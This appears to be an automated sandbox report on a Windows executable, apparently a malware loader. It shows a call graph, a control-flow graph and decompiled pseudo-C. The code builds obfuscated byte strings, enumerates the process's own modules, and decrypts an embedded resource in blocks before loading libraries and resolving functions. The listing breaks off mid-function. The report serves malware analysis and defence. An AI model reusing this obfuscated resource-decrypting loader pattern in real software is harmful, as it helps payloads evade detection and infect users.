29755 40228b VariantInit 29754->29755 29756 4022a7 29755->29756 29757 4022d9 SafeArrayCreate SafeArrayAccessData 29756->29757 29936 40b350 29757->29936 29760 40232c 29761 402354 SafeArrayDestroy 29760->29761 29762 40235b 29760->29762 29761->29762 29763 402392 SafeArrayCreateVector 29762->29763 29764 4023a4 29763->29764 29765 4023bc VariantClear VariantClear 29764->29765 29938 4019a0 29765->29938 29768 40242e 29769 4019a0 66 API calls 29768->29769 29769->29748 29969 40e8de 29770->29969 29772 40ea1b 29772->29604 29773->29577 29774->29581 29775->29589 29776->29592 29777->29596 29778->29600 29779->29607 29780->29616 29781->29624 29783 4104a7 GetModuleHandleW 29782->29783 29784 410486 29782->29784 29785 4104c2 GetProcAddress 29783->29785 29786 4104b7 29783->29786 29784->29783 29787 410490 TlsGetValue 29784->29787 29789 41049f 29785->29789 29803 40e76a Sleep GetModuleHandleW 29786->29803 29791 41049b 29787->29791 29789->29627 29790 4104bd 29790->29785 29790->29789 29791->29783 29791->29789 29792->29634 29793->29636 29796 411cc3 29794->29796 29797 4109c5 29796->29797 29798 411ce1 Sleep 29796->29798 29804 40e231 29796->29804 29797->29614 29800 4104e9 6 API calls __crt_waiting_on_module_handle 29797->29800 29799 411cf6 29798->29799 29799->29796 29799->29797 29800->29640 29801->29643 29803->29790 29805 40e23d __fcloseall 29804->29805 29806 40e255 29805->29806 29811 40e274 _memset 29805->29811 29817 40bfc1 63 API calls __getptd_noexit 29806->29817 29808 40e26a __fcloseall 29808->29796 29809 40e25a 29818 40e744 6 API calls 2 library calls 29809->29818 29810 40e2e6 RtlAllocateHeap 29810->29811 29811->29808 29811->29810 29819 40d6e0 29811->29819 29826 40def2 5 API calls 2 library calls 29811->29826 29827 40e32d LeaveCriticalSection _doexit 29811->29827 29828 40d2e3 6 API calls __decode_pointer 29811->29828 29817->29809 29820 40d6f5 29819->29820 29821 40d708 EnterCriticalSection 29819->29821 29829 40d61d 63 API calls 8 library calls 29820->29829 29821->29811 29823 40d6fb 29823->29821 29830 40e79a 63 API calls 3 library calls 29823->29830 29825 40d707 29825->29821 29826->29811 29827->29811 29828->29811 29829->29823 29830->29825 29831->29646 29832->29658 29833->29657 29836 411c7e 29834->29836 29837 411cb4 29836->29837 29838 411c95 Sleep 29836->29838 29841 40b84d 29836->29841 29837->29671 29837->29679 29839 411caa 29838->29839 29839->29836 29839->29837 29840->29680 29842 40b900 29841->29842 29852 40b85f 29841->29852 29868 40d2e3 6 API calls __decode_pointer 29842->29868 29844 40b906 29869 40bfc1 63 API calls __getptd_noexit 29844->29869 29849 40b8bc RtlAllocateHeap 29849->29852 29850 40b870 29850->29852 29859 40ec4d 63 API calls 2 library calls 29850->29859 29860 40eaa2 63 API calls 7 library calls 29850->29860 29861 40e7ee 29850->29861 29852->29849 29852->29850 29853 40b8ec 29852->29853 29856 40b8f1 29852->29856 29858 40b8f8 29852->29858 29864 40b7fe 63 API calls 4 library calls 29852->29864 29865 40d2e3 6 API calls __decode_pointer 29852->29865 29866 40bfc1 63 API calls __getptd_noexit 29853->29866 29867 40bfc1 63 API calls __getptd_noexit 29856->29867 29858->29836 29859->29850 29860->29850 29870 40e7c3 GetModuleHandleW 29861->29870 29864->29852 29865->29852 29866->29856 29867->29858 29868->29844 29869->29858 29871 40e7d7 GetProcAddress 29870->29871 29872 40e7ec ExitProcess 29870->29872 29871->29872 29873 40e7e7 CorExitProcess 29871->29873 29873->29872 29876 41265c 29874->29876 29878 4126c9 29876->29878 29881 416836 73 API calls x_ismbbtype_l 29876->29881 29877 4127c7 29877->29690 29877->29692 29878->29877 29879 416836 73 API calls _parse_cmdline 29878->29879 29879->29878 29880->29685 29881->29876 29882->29699 29883->29705 29884->29708 29885->29698 29886->29698 29888 41358c 29887->29888 29889 41046e __encode_pointer 6 API calls 29888->29889 29890 4135a4 29888->29890 29889->29888 29890->29713 29891->29715 29894 40b9aa __fcloseall _strnlen 29892->29894 29893 40b9b8 29948 40bfc1 63 API calls __getptd_noexit 29893->29948 29894->29893 29898 40b9ec 29894->29898 29896 40b9bd 29949 40e744 6 API calls 2 library calls 29896->29949 29899 40d6e0 __lock 63 API calls 29898->29899 29900 40b9f3 29899->29900 29950 40b917 121 API calls 3 library calls 29900->29950 29902 40b9ff 29951 40ba18 LeaveCriticalSection _doexit 29902->29951 29903 40b9cd __fcloseall 29903->29719 29906 4017cc _realloc 29905->29906 29906->29723 29909 40af70 29907->29909 29908 40b84d _malloc 63 API calls 29908->29909 29909->29908 29910 40af8a 29909->29910 29914 40af8c std::bad_alloc::bad_alloc 29909->29914 29952 40d2e3 6 API calls __decode_pointer 29909->29952 29910->29729 29912 40afb2 29954 40af49 63 API calls std::exception::exception 29912->29954 29914->29912 29953 40d2bd 74 API calls __cinit 29914->29953 29915 40afbc 29955 40cd39 RaiseException 29915->29955 29918 40afca 29920 401903 lstrlenA 29919->29920 29921 4018fc 29919->29921 29956 4017e0 29920->29956 29921->29751 29924 401940 GetLastError 29926 40194b MultiByteToWideChar 29924->29926 29927 40198d 29924->29927 29925 401996 29925->29751 29928 4017e0 73 API calls 29926->29928 29927->29925 29964 401030 GetLastError 29927->29964 29929 401970 MultiByteToWideChar 29928->29929 29929->29927 29932 40af66 75 API calls 29931->29932 29933 40187c 29932->29933 29934 401885 SysAllocString 29933->29934 29935 4018a4 29933->29935 29934->29935 29935->29753 29937 40231a SafeArrayUnaccessData 29936->29937 29937->29760 29939 4019df VariantClear 29938->29939 29940 4019aa InterlockedDecrement 29938->29940 29939->29768 29940->29939 29941 4019b8 29940->29941 29941->29939 29942 4019c2 SysFreeString 29941->29942 29943 4019c9 29941->29943 29942->29943 29968 40aec0 64 API calls 2 library calls 29943->29968 29945->29731 29946->29734 29947->29750 29948->29896 29950->29902 29951->29903 29952->29909 29953->29912 29954->29915 29955->29918 29957 4017e9 29956->29957 29962 401844 29957->29962 29963 40182d 29957->29963 29965 40b783 73 API calls 4 library calls 29957->29965 29961 40186d MultiByteToWideChar 29961->29924 29961->29925 29962->29961 29967 40b743 63 API calls 2 library calls 29962->29967 29963->29962 29966 40b6b5 63 API calls 2 library calls 29963->29966 29965->29963 29966->29962 29967->29962 29968->29939 29970 40e8ea __fcloseall 29969->29970 29971 40d6e0 __lock 63 API calls 29970->29971 29972 40e8f1 29971->29972 29973 40e9ba __initterm 29972->29973 29974 40e91d 29972->29974 29988 40e9f5 29973->29988 29993 4104e9 6 API calls __crt_waiting_on_module_handle 29974->29993 29978 40e928 29980 40e9aa __initterm 29978->29980 29994 4104e9 6 API calls __crt_waiting_on_module_handle 29978->29994 29979 40e9f2 __fcloseall 29979->29772 29980->29973 29983 40e9e9 29984 40e7ee __mtinitlocknum 4 API calls 29983->29984 29984->29979 29985 40e93d 29985->29980 29986 4104e0 6 API calls _doexit 29985->29986 29987 4104e9 6 API calls __decode_pointer 29985->29987 29986->29985 29987->29985 29989 40e9d6 29988->29989 29990 40e9fb 29988->29990 29989->29979 29992 40d606 LeaveCriticalSection 29989->29992 29995 40d606 LeaveCriticalSection 29990->29995 29992->29983 29993->29978 29994->29985 29995->29989

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 32 401cd0-401cd4 24->32 31 401ef3-401f1a call 401300 SizeofResource 26->31 27->31 41 401f1c-401f2f 31->41 42 401f5f-401f69 31->42 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->48 49 401f77-401f8d call 401560 43->49 44->43 45->32 45->39 46->7 50 401d0f 46->50 47->42 48->5 85 4021aa-4021c0 48->85 49->48 55 401d10-401d2e call 401650 50->55 61 401d30-401d34 55->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 65 401d55-401d57 63->65 67 401d3a-401d40 64->67 68 401d4c-401d4e 64->68 65->25 70 401d5d-401d7b call 401650 65->70 67->63 69 401d42-401d4a 67->69 68->65 69->61 69->68 77 401d80-401d84 70->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 84 401da5-401da7 79->84 82 401d8a-401d90 80->82 83 401d9c-401d9e 80->83 82->79 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->77 86->83 87->7 87->55 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-402352 call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 128 402354-402355 SafeArrayDestroy 122->128 129 40235b-402361 122->129 123->122 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 132 402377-402379 131->132 133 40237b 131->133 135 40237d-4023a2 call 4018d0 SafeArrayCreateVector 132->135 133->135 139 4023a4-4023a9 call 40ad90 135->139 140 4023ae-4023b4 135->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99
                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                          			E004019F0(void* __edx, void* __eflags) {
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				void* _t337;
                                                                                                                                                                                                          				void* _t340;
                                                                                                                                                                                                          				int _t341;
                                                                                                                                                                                                          				CHAR* _t344;
                                                                                                                                                                                                          				intOrPtr* _t349;
                                                                                                                                                                                                          				int _t350;
                                                                                                                                                                                                          				long _t352;
                                                                                                                                                                                                          				signed int _t354;
                                                                                                                                                                                                          				intOrPtr _t358;
                                                                                                                                                                                                          				long _t359;
                                                                                                                                                                                                          				CHAR* _t364;
                                                                                                                                                                                                          				struct HINSTANCE__* _t365;
                                                                                                                                                                                                          				CHAR* _t366;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t367;
                                                                                                                                                                                                          				int _t368;
                                                                                                                                                                                                          				int _t369;
                                                                                                                                                                                                          				int _t370;
                                                                                                                                                                                                          				intOrPtr* _t376;
                                                                                                                                                                                                          				int _t378;
                                                                                                                                                                                                          				intOrPtr _t379;
                                                                                                                                                                                                          				intOrPtr* _t381;
                                                                                                                                                                                                          				int _t383;
                                                                                                                                                                                                          				intOrPtr* _t384;
                                                                                                                                                                                                          				int _t385;
                                                                                                                                                                                                          				int _t396;
                                                                                                                                                                                                          				int _t399;
                                                                                                                                                                                                          				int _t402;
                                                                                                                                                                                                          				int _t405;
                                                                                                                                                                                                          				intOrPtr* _t407;
                                                                                                                                                                                                          				int _t413;
                                                                                                                                                                                                          				int _t415;
                                                                                                                                                                                                          				void* _t421;
                                                                                                                                                                                                          				int _t422;
                                                                                                                                                                                                          				int _t424;
                                                                                                                                                                                                          				intOrPtr* _t428;
                                                                                                                                                                                                          				intOrPtr _t429;
                                                                                                                                                                                                          				intOrPtr* _t431;
                                                                                                                                                                                                          				int _t432;
                                                                                                                                                                                                          				int _t435;
                                                                                                                                                                                                          				intOrPtr* _t437;
                                                                                                                                                                                                          				int _t438;
                                                                                                                                                                                                          				intOrPtr* _t439;
                                                                                                                                                                                                          				int _t440;
                                                                                                                                                                                                          				int _t442;
                                                                                                                                                                                                          				signed int _t448;
                                                                                                                                                                                                          				signed int _t451;
                                                                                                                                                                                                          				signed int _t452;
                                                                                                                                                                                                          				int _t469;
                                                                                                                                                                                                          				int _t471;
                                                                                                                                                                                                          				int _t482;
                                                                                                                                                                                                          				signed int _t486;
                                                                                                                                                                                                          				intOrPtr* _t488;
                                                                                                                                                                                                          				intOrPtr* _t490;
                                                                                                                                                                                                          				intOrPtr* _t492;
                                                                                                                                                                                                          				intOrPtr _t493;
                                                                                                                                                                                                          				void* _t494;
                                                                                                                                                                                                          				struct HRSRC__* _t497;
                                                                                                                                                                                                          				void* _t514;
                                                                                                                                                                                                          				int _t519;
                                                                                                                                                                                                          				intOrPtr* _t520;
                                                                                                                                                                                                          				void* _t524;
                                                                                                                                                                                                          				void* _t525;
                                                                                                                                                                                                          				struct HINSTANCE__* _t526;
                                                                                                                                                                                                          				intOrPtr _t527;
                                                                                                                                                                                                          				void* _t531;
                                                                                                                                                                                                          				void* _t535;
                                                                                                                                                                                                          				struct HRSRC__* _t536;
                                                                                                                                                                                                          				intOrPtr* _t537;
                                                                                                                                                                                                          				intOrPtr* _t539;
                                                                                                                                                                                                          				int _t542;
                                                                                                                                                                                                          				int _t543;
                                                                                                                                                                                                          				intOrPtr* _t547;
                                                                                                                                                                                                          				intOrPtr* _t548;
                                                                                                                                                                                                          				intOrPtr* _t549;
                                                                                                                                                                                                          				intOrPtr* _t550;
                                                                                                                                                                                                          				void* _t551;
                                                                                                                                                                                                          				intOrPtr _t552;
                                                                                                                                                                                                          				int _t555;
                                                                                                                                                                                                          				void* _t556;
                                                                                                                                                                                                          				void* _t557;
                                                                                                                                                                                                          				void* _t558;
                                                                                                                                                                                                          				void* _t559;
                                                                                                                                                                                                          				void* _t560;
                                                                                                                                                                                                          				void* _t561;
                                                                                                                                                                                                          				void* _t562;
                                                                                                                                                                                                          				intOrPtr* _t563;
                                                                                                                                                                                                          				void* _t564;
                                                                                                                                                                                                          				void* _t565;
                                                                                                                                                                                                          				void* _t566;
                                                                                                                                                                                                          				void* _t567;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t567 = __eflags;
                                                                                                                                                                                                          				_t494 = __edx;
                                                                                                                                                                                                          				__imp__OleInitialize(0); // executed
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x21)) = 0x20;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x22)) = 0x64;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x23)) = 6;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x29)) = 0xee;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x33)) = 0x78;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x34)) = 0x98;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x38)) = 0;
                                                                                                                                                                                                          				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                                                                                                                                                          				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                                                                                                                                                          				_t557 = _t556 + 0xc;
                                                                                                                                                                                                          				if(_t337 == 0x41b2a0) {
                                                                                                                                                                                                          					L80:
                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                                                                                                                                                          					_t525 = _t340;
                                                                                                                                                                                                          					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x84)) = 0;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x38)) = 0;
                                                                                                                                                                                                          					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                                                                                                                                                                          					if(_t341 == 0) {
                                                                                                                                                                                                          						L38:
                                                                                                                                                                                                          						FindCloseChangeNotification(_t525); // executed
                                                                                                                                                                                                          						_t526 = GetModuleHandleA(0);
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x3c)) = 0;
                                                                                                                                                                                                          						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                                                                                                                                                                          						_t558 = _t557 + 8;
                                                                                                                                                                                                          						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                                                                                                                                                                          						 *(_t558 + 0x50) = _t536;
                                                                                                                                                                                                          						_t551 = LoadResource(_t526, _t536);
                                                                                                                                                                                                          						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                                                                                                                                                                          						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                                                                                                                                                                          						_push(0x40022);
                                                                                                                                                                                                          						_t537 = _t349; // executed
                                                                                                                                                                                                          						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                                                                                                                                                                          						_t559 = _t558 + 8;
                                                                                                                                                                                                          						 *(_t559 + 0x34) = _t350;
                                                                                                                                                                                                          						__eflags = _t350;
                                                                                                                                                                                                          						if(_t350 == 0) {
                                                                                                                                                                                                          							 *(_t559 + 0x50) = 0;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							E0040BA30(_t526, _t350, 0, 0x40022);
                                                                                                                                                                                                          							_t486 =  *(_t559 + 0x40);
                                                                                                                                                                                                          							_t559 = _t559 + 0xc;
                                                                                                                                                                                                          							 *(_t559 + 0x50) = _t486;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						E00401300( *(_t559 + 0x50));
                                                                                                                                                                                                          						_t497 =  *(_t559 + 0x48);
                                                                                                                                                                                                          						_t352 = SizeofResource(_t526, _t497);
                                                                                                                                                                                                          						 *(_t559 + 0x40) = _t352;
                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                          						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                                                                                                                                                                          						__eflags = _t354;
                                                                                                                                                                                                          						if(_t354 > 0) {
                                                                                                                                                                                                          							_t519 =  *(_t559 + 0x3c);
                                                                                                                                                                                                          							_t482 = _t537 - _t519;
                                                                                                                                                                                                          							__eflags = _t482;
                                                                                                                                                                                                          							 *(_t559 + 0x34) = _t519;
                                                                                                                                                                                                          							 *(_t559 + 0x88) = _t482;
                                                                                                                                                                                                          							 *(_t559 + 0x38) = _t354;
                                                                                                                                                                                                          							do {
                                                                                                                                                                                                          								_t424 =  *(_t559 + 0x34);
                                                                                                                                                                                                          								_push( *(_t559 + 0x88) + _t424);
                                                                                                                                                                                                          								_push(0x400);
                                                                                                                                                                                                          								_push(_t424);
                                                                                                                                                                                                          								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                                                                                                                                                                          								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                                                                                                                                                                          								_t179 = _t559 + 0x38;
                                                                                                                                                                                                          								 *_t179 =  *(_t559 + 0x38) - 1;
                                                                                                                                                                                                          								__eflags =  *_t179;
                                                                                                                                                                                                          							} while ( *_t179 != 0);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t448 =  *(_t559 + 0x40) & 0x800003ff;
